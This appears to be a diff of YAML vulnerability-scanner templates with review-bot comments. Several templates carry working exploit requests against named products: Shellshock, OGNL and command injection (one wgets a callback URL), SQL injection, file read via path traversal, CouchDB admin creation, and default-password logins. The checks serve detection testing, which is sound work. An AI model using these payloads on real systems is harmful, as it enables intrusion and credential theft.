author: B1anda0(https://github.com/B1anda0)
links:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773


@ -0,0 +1,10 @@
name: poc-yaml-apache-kylin-unauth-cve-2020-13937
rules:
- method: GET
path: /kylin/api/admin/config
expression: |
response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
detail:
author: JingLing(github.com/shmilylty)
links:
- https://s.tencent.com/research/bsafe/1156.html


@ -0,0 +1,12 @@
name: poc-yaml-apache-nifi-api-unauthorized-access
manual: true
transport: http
rules:
- method: GET
path: /nifi-api/flow/current-user
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://nifi.apache.org/docs/nifi-docs/rest-api/index.html


@ -11,7 +11,7 @@ rules:
version="1.0"?><methodCall><methodName>{{rand}}</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
detail:
author: su(https://suzzz112113.github.io/#blog)
links:


@ -1,21 +0,0 @@
name: poc-yaml-apache-solr-file-read
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
search: |
"name":"(?P<core_name>.+?)",
expression:
response.status == 200
- method: POST
path: "/solr/{{core_name}}/config"
headers:
Content-type: application/json
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.status == 200 && response.body.bcontains(b"This")
detail:
author: flyinbed
links:
- "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg"
- "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ"


@ -0,0 +1,16 @@
name: poc-yaml-aspcms-backend-leak
rules:
- method: GET
path: /plug/oem/AspCms_OEMFun.asp
expression: |
response.status == 200 && "<script>alert".bmatches(response.body) && "top.location.href='(.*?)';".bmatches(response.body)
search: >-
(?P<path>(/(.*?).asp))
- method: GET
path: /{{path}}
expression: |
response.status == 200 && response.body.bcontains(b"username")
detail:
author: Hzllaga
links:
- https://www.onebug.org/wooyundata/65458.html


@ -1,17 +0,0 @@
name: poc-yaml-atlassian-confluence-rce
set:
rand1: randomInt(1000, 9999)
rand2: randomInt(400, 9999)
rules:
- method: POST
path: "/pages/createpage-entervariables.action"
follow_redirects: true
body: |
queryString=alt3kx\u0027%2b#{{{rand1}}*{{rand2}}}%2b\u0027
expression: |
response.status == 200 && response.body.bcontains(bytes(string(rand1 * rand2)))
detail:
author: tangshoupu
info: Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)
links:
- https://mp.weixin.qq.com/s/lVCT6JAA_BU9h4ISLlMNbQ


@ -0,0 +1,14 @@
name: poc-yaml-bash-cve-2014-6271
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: GET
headers:
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'"
follow_redirects: false
expression: response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: neal1991(https://github.com/neal1991)
links:
- https://github.com/opsxcq/exploit-CVE-2014-6271


@ -0,0 +1,15 @@
name: poc-yaml-cacti-weathermap-file-write
rules:
- method: GET
path: >-
/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7
follow_redirects: false
expression: response.status == 200
- method: GET
path: /plugins/weathermap/configs/test.php
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"46ea1712d4b13b55b3f680cc5b8b54e8")
detail:
author: whynot(https://github.com/notwhy)
links:
- https://www.secpulse.com/archives/47690.html


@ -0,0 +1,9 @@
name: poc-yaml-chinaunicom-modem-default-password
rules:
- method: POST
path: /cu.html
body: >-
frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
follow_redirects: false
expression: |
response.status == 302 && response.headers["location"] == "/menu.gch"
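Review bot: This file has no `detail` block (author, links), unlike every other POC added in this commit, so nothing records where the check came from or what it targets. The header lookup `response.headers["location"]` at line 757 also differs from `response.headers["Location"]` at line 557; unless the engine canonicalises header names, one of the two spellings never matches, so pick one form across the POC set.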


@ -0,0 +1,11 @@
name: poc-yaml-citrix-cve-2019-19781-path-traversal
rules:
- method: GET
path: /vpn/../vpns/cfg/smb.conf
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
detail:
author: su(https://suzzz112113.github.io/#blog)
links:
- https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/


@ -0,0 +1,18 @@
name: poc-yaml-citrix-cve-2020-8191-xss
set:
r1: randomLowercase(6)
rules:
- method: POST
path: /menu/stapp
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
follow_redirects: true
expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>")) && response.body.bcontains(b"citrix")
detail:
author: JingLing(https://hackfun.org/)
links:
- https://support.citrix.com/article/CTX276688
- https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
- https://dmaasland.github.io/posts/citrix.html


@ -0,0 +1,20 @@
name: poc-yaml-citrix-cve-2020-8193-unauthorized
set:
user: randomLowercase(8)
pass: randomLowercase(8)
rules:
- method: POST
path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
headers:
Content-Type: application/xml
X-NITRO-USER: '{{user}}'
X-NITRO-PASS: '{{pass}}'
body: <appfwprofile><login></login></appfwprofile>
follow_redirects: false
expression: >
response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
detail:
author: bufsnake(https://github.com/bufsnake)
links:
- https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
- https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html


@ -0,0 +1,11 @@
name: poc-yaml-citrix-xenmobile-cve-2020-8209
rules:
- method: GET
path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
follow_redirects: false
expression: |
response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209


@ -0,0 +1,13 @@
name: poc-yaml-coldfusion-cve-2010-2861-lfi
rules:
- method: GET
path: >-
/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=")
detail:
version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions
author: sharecast
links:
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861


@ -0,0 +1,10 @@
name: poc-yaml-confluence-cve-2015-8399
rules:
- method: GET
path: /spaces/viewdefaultdecorator.action?decoratorName
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
detail:
author: whynot(https://github.com/notwhy)
links:
- https://www.anquanke.com/vul/id/1150798


@ -0,0 +1,17 @@
name: poc-yaml-confluence-cve-2019-3396-lfi
rules:
- method: POST
path: /rest/tinymce/1/macro/preview
headers:
Content-Type: "application/json"
Host: localhost
Referer: http://localhost
body: >-
{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"<param-name>contextConfigLocation</param-name>")
detail:
author: sharecast
links:
- https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396


@ -0,0 +1,15 @@
name: poc-yaml-confluence-cve-2021-26084
set:
r1: randomInt(100000, 999999)
r2: randomInt(100000, 999999)
rules:
- method: POST
path: /pages/createpage-entervariables.action?SpaceKey=x
body: |
queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: Loneyer(https://github.com/Loneyers)
links:
- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html


@ -0,0 +1,12 @@
name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read
set:
rand: randomLowercase(6)
rules:
- method: GET
path: /s/{{rand}}/_/;/WEB-INF/web.xml
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html


@ -0,0 +1,10 @@
name: poc-yaml-consul-rexec-rce
rules:
- method: GET
path: /v1/agent/self
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")
detail:
author: imlonghao(https://imlonghao.com/)
links:
- https://www.exploit-db.com/exploits/46073


@ -0,0 +1,10 @@
name: poc-yaml-consul-service-rce
rules:
- method: GET
path: /v1/agent/self
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true")
detail:
author: imlonghao(https://imlonghao.com/)
links:
- https://www.exploit-db.com/exploits/46074
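Review bot: The expression under `expression: |` mixes `&&` and `||` without parentheses, so `response.status == 200 && response.content_type.contains("json")` gates only the `EnableScriptChecks` check; the `EnableRemoteScriptChecks` branch fires on any status and any content type, which is a false-positive source. Group the two body checks: `response.status == 200 && response.content_type.contains("json") && (response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true"))`.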


@ -0,0 +1,16 @@
name: poc-yaml-couchcms-cve-2018-7662
rules:
- method: GET
path: /includes/mysql2i/mysql2i.func.php
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")
- method: GET
path: /addons/phpmailer/phpmailer.php
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in")
detail:
author: we1x4n(https://we1x4n.github.io/)
links:
- https://github.com/CouchCMS/CouchCMS/issues/46


@ -0,0 +1,24 @@
name: poc-yaml-couchdb-cve-2017-12635
set:
r1: randomLowercase(32)
rules:
- method: PUT
path: '/_users/org.couchdb.user:{{r1}}'
headers:
Content-Type: application/json
Content-Length: '192'
body: |-
{
"type": "user",
"name": "{{r1}}",
"roles": ["_admin"],
"roles": [],
"password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
}
follow_redirects: false
expression: |
response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1))
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635


@ -0,0 +1,11 @@
name: poc-yaml-couchdb-unauth
rules:
- method: GET
path: /_config
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager")
detail:
author: FiveAourThe(https://github.com/FiveAourThe)
links:
- https://www.seebug.org/vuldb/ssvid-91597


@ -0,0 +1,20 @@
name: poc-yaml-craftcms-seomatic-cve-2020-9757-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
groups:
poc1:
- method: GET
path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
expression: |
response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
poc2:
- method: GET
path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
expression: |
response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: x1n9Qi8
links:
- http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757


@ -0,0 +1,14 @@
name: poc-yaml-datang-ac-default-password-cnvd-2021-04128
rules:
- method: POST
path: /login.cgi
follow_redirects: false
body: >-
user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
expression: |
response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128
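Review bot: `response.headers["set-cookie"]` in the expression is indexed without first checking that the header exists; the discuz-wechat-plugins POC on this page guards the same access with `"set-cookie" in response.headers &&`, and the unguarded form recurs in the dedecms-url-redirection and dlink-dsl-2888a hunks (`response.headers["location"]`). How the evaluator treats a missing key depends on the CEL runtime behind the parser, which is not visible here; the guard makes the rule's outcome independent of that. Suggested: `response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")`.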


@ -0,0 +1,22 @@
name: poc-yaml-dedecms-carbuyaction-fileinclude
rules:
- method: GET
path: /plus/carbuyaction.php?dopost=return&code=../../
headers:
Cookie: code=alipay
follow_redirects: true
expression: |
response.status == 200
- method: GET
path: /plus/carbuyaction.php?dopost=return&code=../../
headers:
Cookie: code=cod
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes("Cod::respond()"))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: "DedeCmsV5.x"
links:
- https://www.cnblogs.com/milantgh/p/3615986.html


@ -0,0 +1,10 @@
name: poc-yaml-dedecms-cve-2018-6910
rules:
- method: GET
path: /include/downmix.inc.php
expression: |
response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
detail:
author: PickledFish(https://github.com/PickledFish)
links:
- https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md


@ -0,0 +1,15 @@
name: poc-yaml-dedecms-cve-2018-7700-rce
set:
r: randomInt(2000000000, 2100000000)
rules:
- method: GET
path: >-
/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field}
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: "V5.7SP2正式版(2018-01-09)"
links:
- https://xz.aliyun.com/t/2224


@ -0,0 +1,26 @@
name: poc-yaml-dedecms-guestbook-sqli
set:
r: randomInt(800000000, 1000000000)
rules:
- method: GET
path: /plus/guestbook.php
follow_redirects: true
expression: |
response.status == 200
search: action=admin&id=(?P<articleid>\d{1,20})
- method: GET
path: /plus/guestbook.php?action=admin&job=editok&id={{articleid}}&msg=',msg=@`'`,msg=(selecT md5({{r}})),email='
follow_redirects: true
expression: |
response.status == 200
- method: GET
path: /plus/guestbook.php
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: "5.7"
links:
- https://blog.csdn.net/god_7z1/article/details/8180454


@ -0,0 +1,15 @@
name: poc-yaml-dedecms-membergroup-sqli
set:
r: randomInt(800000000, 1000000000)
rules:
- method: GET
path: >-
/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'`
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
detail:
author: harris2015(https://github.com/harris2015)
Affected Version: "5.6,5.7"
links:
- http://www.dedeyuan.com/xueyuan/wenti/1244.html


@ -0,0 +1,13 @@
name: poc-yaml-dedecms-url-redirection
rules:
- method: GET
path: >-
/plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
follow_redirects: false
expression: >
response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com"
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "V5.7 sp1"
links:
- https://blog.csdn.net/ystyaoshengting/article/details/82734888


@ -0,0 +1,14 @@
name: poc-yaml-discuz-v72-sqli
rules:
- method: GET
path: >-
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info</b>: MySQL Query Error")
detail:
author: leezp
Affected Version: "discuz <=v7.2"
vuln_url: "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20"
links:
- https://blog.csdn.net/weixin_40709439/article/details/82780606


@ -0,0 +1,11 @@
name: poc-yaml-discuz-wechat-plugins-unauth
rules:
- method: GET
path: '/plugin.php?id=wechat:wechat&ac=wxregister'
follow_redirects: false
expression: |
response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com")
detail:
author: JrD
links:
- https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI


@ -0,0 +1,17 @@
name: poc-yaml-discuz-wooyun-2010-080723
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: >-
/viewthread.php?tid=10
headers:
Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}}));
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
version: Discuz 7.x/6.x
author: Loneyer
links:
- https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723


@ -0,0 +1,17 @@
name: poc-yaml-dlink-850l-info-leak
rules:
- method: POST
path: /hedwig.cgi
headers:
Content-Type: text/xml
Cookie: uid=R8tBjwtFc8
body: |-
<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
follow_redirects: false
expression: >
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
detail:
author: cc_ci(https://github.com/cc8ci)
Affected Version: "Dir-850L"
links:
- https://xz.aliyun.com/t/2941


@ -0,0 +1,19 @@
name: poc-yaml-dlink-cve-2019-16920-rce
set:
reverse: newReverse()
reverseURL: reverse.url
rules:
- method: POST
path: /apply_sec.cgi
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
follow_redirects: true
expression: |
response.status == 200 && reverse.wait(5)
detail:
author: JingLing(https://hackfun.org/)
links:
- https://www.anquanke.com/post/id/187923
- https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
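Review bot: This rule depends on `newReverse()` and `reverse.wait(5)`, which can only succeed when a reachable reverse/OOB endpoint is configured; without one, every scanned host pays the 5-second wait and the rule can never match. Whether the parser in this commit implements `newReverse` is not visible here; if it does not, the POC should be skipped at load time, or at least documented as requiring that configuration, rather than silently failing per target. A `detail` entry such as `info: requires a configured reverse (OOB) endpoint; otherwise the rule never matches` would make the requirement explicit, following the `info:` key already used by other POCs on this page.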


@ -7,7 +7,7 @@ rules:
body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
detail:
author: l1nk3r,Huasir(https://github.com/dahua966/)
links:


@ -5,7 +5,8 @@ rules:
/config/getuser?index=0
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain")
response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
detail:
author: kzaopa(https://github.com/kzaopa)
links:
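Review bot: The new expression keeps `response.headers["Content-Type"]` with a capitalised key, while every other header lookup on this page uses a lowercase name (`set-cookie`, `location`) and the parallel dlink and docker hunks in this commit switched to `response.content_type.contains(...)`. If the parser normalises header names to lowercase, this lookup never matches and the rule is a guaranteed false negative. Use the same accessor as the sibling hunks: `response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")`. The enclosing rule starts outside the hunk.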


@ -7,7 +7,7 @@ rules:
body: >-
SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
expression: >
response.status == 200 && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
detail:
author: x1n9Qi8
Affected Version: "Dlink DIR-610"


@ -1,9 +0,0 @@
name: poc-yaml-dlink-dcs-info-leak
rules:
- method: GET
path: /config/getuser?index=0
expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=")
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw


@ -0,0 +1,25 @@
name: poc-yaml-dlink-dsl-2888a-rce
rules:
- method: GET
path: /page/login/login.html
follow_redirects: false
expression: |
response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"var ModelName=\"DSL-2888A\";")
- method: POST
path: /
body: username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
headers:
Content-Type: application/x-www-form-urlencoded
follow_redirects: false
expression: |
response.status == 302 && response.headers["location"] == "/page/login/login_fail.html"
- method: GET
path: /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=id
follow_redirects: false
expression: |
response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"uid=0(admin) gid=0(admin)")
detail:
author: mvhz81
info: dlink-dsl-2888a CVE-2020-24579(Insufficient Authentication) + Hidden Functionality (CVE-2020-24581) = RCE
links:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/


@ -4,7 +4,7 @@ rules:
path: /info
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)


@ -0,0 +1,21 @@
name: poc-yaml-dotnetcms-sqli
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(1, 100)
rules:
- method: GET
path: /user/City_ajax.aspx
follow_redirects: false
expression: |
response.status == 200
- method: GET
path: >-
/user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2--
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
detail:
Affected Version: "v1.0~v2.0"
links:
- https://www.cnblogs.com/rebeyond/p/4951418.html
- http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742


@ -0,0 +1,15 @@
name: poc-yaml-draytek-cve-2020-8515
rules:
- method: POST
path: /cgi-bin/mainfunction.cgi
headers:
Content-Type: text/plain; charset=UTF-8
body: >-
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
expression: >
response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "Vigor2960, Vigor300B, Vigor3900 < v1.5.1, VigorSwitch20P2121, VigorSwitch20G1280, VigorSwitch20P1280, VigorSwitch20G2280, VigorSwitch20P2280 <= v2.3.2"
links:
- https://github.com/imjdl/CVE-2020-8515-PoC


@ -2,15 +2,35 @@ name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
groups:
drupal8:
- method: POST
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
drupal7:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2


@ -1,29 +0,0 @@
name: poc-yaml-drupal-cve-2018-7600-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
test:
target: http://cve-2018-7600-8-x.vulnet:8080/


@ -25,7 +25,7 @@ rules:
}
follow_redirects: true
expression: |
response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2))
response.status == 403 && response.content_type.contains("hal+json") && response.body.bcontains(bytes(r1 + "%" + r2))
detail:
author: thatqier
links:


@ -1,28 +0,0 @@
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
search: |
name="form_build_id"\s+value="(?P<build_id>.+?)"
expression: |
response.status == 200
- method: POST
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: |
response.body.bcontains(bytes(r1 + "%" + r2))
detail:
drupal_version: 7
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/


@ -1,20 +0,0 @@
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
